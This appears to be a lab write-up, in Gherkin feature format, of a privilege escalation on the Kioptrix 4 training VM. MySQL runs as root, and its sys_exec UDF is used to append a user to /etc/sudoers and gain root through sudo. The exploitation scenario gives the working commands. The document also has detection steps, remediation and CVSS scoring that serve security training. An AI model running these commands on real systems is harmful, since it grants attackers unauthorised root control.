## Version 1.4.1
## language: en

Feature:
  TOE:
    Kioptrix 4
  Category:
   Privilege Escalation
  Location:
    Kioptrix4
  CWE:
    CWE-250: Execution with Unnecessary Privileges
  Rule:
    REQ.269 Use principle of least privilege
  Goal:
    Executing command as root
  Recommendation:
    Run the service using the lowest privileges that are required to accomplish
    the necessary tasks

  Background:
  Hacker's software:
    |<software name>       | <version>      |
    | Kali Linux           | 2018.3         |
    | OpenSSH              | 7.7p1          |
  TOE information:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials

  Scenario: Normal use case:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I connect to the database
    And execute queries on there

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I execute the following command
    """
    ps -aux | grep root
    """
    And I see that MySQL runs as root
    When I use the following command to check if it has UDF
    """
    $ locate udf
    ...
    /usr/lib/lib_mysqludf_sys.so
    ...
    """
    Then I know that I can execute commands with MySQL as root

  Scenario: Exploitation
    Given I am accessing the server 192.168.60.130 through SSH
    And that I have credentials to the MySQL database
    Then I can use the following query to execute commands on the server
    """
    > select sys_exec('echo "robert ALL=(ALL) ALL" >> /etc/sudoers');
    > exit
    """
    And now the user "robert" is part of sudoers
    Then I can execute the following
    """
    $ sudo su
    """
    And use the user's password
    Then I can execute commands as root

  Scenario: Remediation
    Run the service using the lowest privileges that are required to accomplish
    the necessary tasks

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) -AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    8.8/10 (High) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.8/10 (High) - CR:H/IR:H/AR:H/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2020-04-03
